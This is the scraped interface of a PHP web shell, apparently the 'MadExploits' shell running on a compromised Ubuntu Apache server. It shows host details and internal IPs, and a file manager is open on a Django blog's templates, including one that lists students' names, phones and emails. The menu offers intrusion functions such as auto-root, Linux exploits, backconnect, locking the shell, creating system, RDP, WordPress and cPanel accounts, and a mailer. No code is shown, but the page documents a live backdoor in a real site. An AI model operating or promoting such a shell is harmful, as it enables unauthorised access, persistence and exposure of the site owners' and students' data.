Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
blog /
templates /
blog /
[ HOME SHELL ]
Name
Size
Permission
Action
Navbar.html
1.37
KB
-rw-r--r--
addblog.html
1.95
KB
-rw-r--r--
blog_details.html
1.74
KB
-rw-r--r--
blog_list.html
1.91
KB
-rw-r--r--
blogprofile.html
0
B
-rw-r--r--
student_list.html
852
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : student_list.html
{% extends "base.html" %} {% block content %} <div class="flex justify-between items-center"> <h1 class="text-3xl font-bold mb-4">All Student</h1> <buotton class="border border-blue-500 bg-blue-500 cursor-pointer text-white py-2 px-4 rounded-md font-bold mb-4">Add New Student</buotton> </div> <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-5"> {% for student in students %} <div class=" p-4 border border-gray-300 rounded"> <h2 class="text-2xl font-bold"> <!-- <a href="{% url 'blog_detail' student.slug %}">{{ student.name }}</a> --> <a href="/">{{ student.name }}</a> </h2> <p class="text-sm text-gray-600">By {{ student.phone }}</p> <p>{{ student.email }}</p> </div> {% endfor %} </div> {% endblock %}
Close